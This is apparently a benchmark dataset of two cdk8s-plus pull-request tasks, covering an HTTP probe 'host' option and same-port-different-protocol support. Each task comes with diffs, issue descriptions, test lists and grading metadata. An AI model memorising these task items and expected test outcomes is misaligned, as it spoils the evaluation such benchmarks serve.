{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-27/main: Backport a PR to the k8s-27 branch", "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.99, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests that Role objects honor rules passed via roleProps, mirroring existing ClusterRole behavior. The added test asserts that the synthesized manifest includes those rules, directly matching the stated requirement. No misalignment with the test suite is observed and there are no external dependencies or ambiguous specifications. Therefore the task is well‑defined and solvable (code A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
acc315749224bc89ad4ff81a86d78a991d5c9787
2024-03-01 11:27:25
cdk8s-team__cdk8s-plus-3818
diff --git a/src/_action.ts b/src/_action.ts index a1c7bc6c..40bb8d88 100644 --- a/src/_action.ts +++ b/src/_action.ts @@ -21,11 +21,16 @@ export class Action { return { command }; } - public static fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme } = { }): k8s.HttpGetAction { + public static fromHttpGet(container: Container, path: string, options: { + port?: number; + scheme?: ConnectionScheme; + host?: string; + } = {}): k8s.HttpGetAction { return { path, port: k8s.IntOrString.fromNumber(options.port ?? container.portNumber ?? 80), scheme: options.scheme ?? ConnectionScheme.HTTP, + host: options.host, }; } -} \ No newline at end of file +} diff --git a/src/probe.ts b/src/probe.ts index e10fc8e8..048e619c 100644 --- a/src/probe.ts +++ b/src/probe.ts @@ -85,6 +85,13 @@ export interface HttpGetProbeOptions extends ProbeOptions { * @default ConnectionScheme.HTTP */ readonly scheme?: ConnectionScheme; + + /** + * The host name to connect to on the container. + * + * @default - defaults to the pod IP + */ + readonly host?: string; } /**
feat(probe): add `host` property to HttpGet probes HttpGet probes has `host` field. Added support for it in cdk8s-plus: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.26/#httpgetaction-v1-core
**Title** Add support for specifying a custom host in HTTP GET probes **Problem** HTTP GET probes always target the pod IP, making it impossible to direct probes to a specific hostname when required (e.g., when using virtual hosts or DNS overrides). **Root Cause** The probe abstraction does not expose the `host` field of the underlying Kubernetes `HttpGetAction`, so callers cannot set it. **Fix / Expected Behavior** - Introduce an optional `host` property in the HTTP GET probe options. - Forward the provided `host` value to the generated `HttpGetAction` sent to the Kubernetes API. - Preserve existing defaults (pod IP) when the property is omitted. - Ensure the new option integrates with existing probe configuration APIs without altering current behavior. **Risk & Validation** - Verify that probes with a custom host are correctly rendered in the manifest and accepted by the API server. - Run existing unit and integration tests to confirm no regressions in probe handling. - Add tests covering the new `host` option to ensure proper defaulting and propagation.
3,818
cdk8s-team/cdk8s-plus
diff --git a/test/probe.test.ts b/test/probe.test.ts index 17946ea5..8040b027 100644 --- a/test/probe.test.ts +++ b/test/probe.test.ts @@ -57,6 +57,7 @@ describe('fromHttpGet()', () => { periodSeconds: Duration.seconds(5), successThreshold: 3, timeoutSeconds: Duration.minutes(2), + host: '1.1.1.1', }); // THEN @@ -65,6 +66,7 @@ describe('fromHttpGet()', () => { path: '/hello', port: k8s.IntOrString.fromNumber(5555), scheme: 'HTTP', + host: '1.1.1.1', }, failureThreshold: 11, initialDelaySeconds: 60,
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "Can mutate metadata", "minimal definition", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "defaults", "custom", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaultChild", "default configuration", "custom configuration", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly 
specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the 
container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with 
identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a 
Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration 
set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can select namespaces", "can select all namespaces", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from 
an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read 
permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", 
"giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress" ]
Method: Action.fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme; host?: string } = {}): k8s.HttpGetAction Location: src/_action.ts Inputs: - **container** – Container instance whose ports may be used as a default for the HTTP GET action. - **path** – The request path to probe (e.g., “/health”). - **options** – Optional overrides: - **port** (number) – target port; defaults to the container’s port or 80. - **scheme** (ConnectionScheme) – “HTTP” or “HTTPS”; defaults to HTTP. - **host** (string) – host name or IP to connect to; if omitted the pod IP is used. Outputs: Returns a `k8s.HttpGetAction` object containing `path`, `port` (as `IntOrString`), `scheme`, and, when supplied, `host`. Description: Constructs a Kubernetes `HttpGetAction` for use in probes, now supporting an explicit `host` field to target a specific hostname or IP. Interface: HttpGetProbeOptions Location: src/probe.ts Inputs (properties): - **scheme?** – `ConnectionScheme`; defaults to HTTP. - **host?** – string; the host name to connect to on the container (defaults to the pod IP). - (other properties inherited from `ProbeOptions` such as `port`, `initialDelaySeconds`, etc.). Outputs: N/A (pure data shape). Description: Configuration object for HTTP GET probes. The interface now includes an optional `host` property allowing callers to specify the target host for the HTTP request.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 14, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-27/main: Backport a PR to the k8s-27 branch", "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.26/#httpgetaction-v1-core" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `host` property to HttpGet probes and updating the API accordingly. The test changes assert that the `host` field is present in the generated probe configuration, matching the intended behavior. There are no signs of test coupling, naming expectations, missing specs, or external dependencies beyond the linked documentation, so the task is well‑specified and solvable. 
Therefore it is classified as a clean A‑type task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e526be13b072255a753bb36aa97c1fd5cd839005
2024-04-07 09:03:08
cdk8s-team__cdk8s-plus-3988
diff --git a/src/container.ts b/src/container.ts index 3357c648..28048a6e 100644 --- a/src/container.ts +++ b/src/container.ts @@ -820,14 +820,15 @@ export class Container { public addPort(port: ContainerPort) { const names = this._ports.map(p => p.name).filter(x => x); - const numbers = this._ports.map(p => p.number); + const numberProtocols = this._ports.map(p => `${p.number}/${p.protocol || Protocol.TCP}`); if (port.name && names.includes(port.name)) { throw new Error(`Port with name ${port.name} already exists`); } - if (numbers.includes(port.number)) { - throw new Error(`Port with number ${port.number} already exists`); + const protocol = `${port.number}/${port.protocol || Protocol.TCP}`; + if (numberProtocols.includes(protocol)) { + throw new Error(`Port with number ${port.number} and protocol ${port.protocol || Protocol.TCP} already exists`); } this._ports.push(port);
fix(container): allow the same port number with different protocols (#3508) # Backport This will backport the following commits from `k8s-28/main` to `k8s-26/main`: - [fix(container): allow the same port number with different protocols (#3508)](https://github.com/cdk8s-team/cdk8s-plus/pull/3508) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow containers to expose the same port number with different protocols **Problem** Container definitions reject duplicate port numbers even when the protocols differ, preventing legitimate configurations such as TCP and UDP on the same numeric port. **Root Cause** Port uniqueness checks considered only the numeric value, ignoring the associated protocol. **Fix / Expected Behavior** - Validate port uniqueness based on the combination of number **and** protocol. - Permit multiple ports that share the same number as long as their protocols are distinct. - Preserve existing error handling for truly duplicate (number + protocol) entries. - Update error messages to reflect the combined number‑protocol context. **Risk & Validation** - Verify that existing containers with duplicate numbers and identical protocols continue to raise errors. - Add tests covering allowed same-number‑different‑protocol scenarios and disallowed same-number‑same‑protocol cases. - Ensure no regressions in container port handling across supported Kubernetes versions.
3,988
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index 331b6fd5..eccb9ba7 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -180,23 +180,56 @@ describe('EnvValue', () => { describe('Container', () => { - test('cannot configure identical ports at instantiation', () => { + test('cannot configure identical ports and protocols at instantiation', () => { expect(() => new kplus.Container({ image: 'image', ports: [ { number: 8080, + protocol: kplus.Protocol.TCP, }, { number: 8080, + protocol: kplus.Protocol.TCP, }, ], - })).toThrowError('Port with number 8080 already exists'); + })).toThrowError('Port with number 8080 and protocol TCP already exists'); }); - test('cannot add an already existing port number', () => { + test('can configure identical ports with different protocols at instantiation', () => { + const container = new kplus.Container({ + image: 'image', + ports: [ + { + number: 8080, + protocol: kplus.Protocol.TCP, + }, + { + number: 8080, + protocol: kplus.Protocol.UDP, + }, + ], + }); + + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); + }); + + test('cannot add an already existing port number with identical protocol', () => { const container = new kplus.Container({ image: 'image', @@ -205,8 +238,38 @@ describe('Container', () => { }], }); - expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 already exists'); + expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 and protocol TCP already exists'); + + }); + + test('can add an already existing port number with a different protocol', () => { + + const container = new kplus.Container({ + image: 'image', + ports: [{ + number: 8080, + protocol: kplus.Protocol.TCP, + }], + }); + 
container.addPort({ + number: 8080, + protocol: kplus.Protocol.UDP, + }); + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); }); test('cannot add an already existing port name', () => {
[ "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol" ]
[ "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "fromCommand", "fromHttpGet", "fromTcpSocket", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA 
with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy 
has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", 
"Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "Synthesizes spec lazily", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", 
"PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple 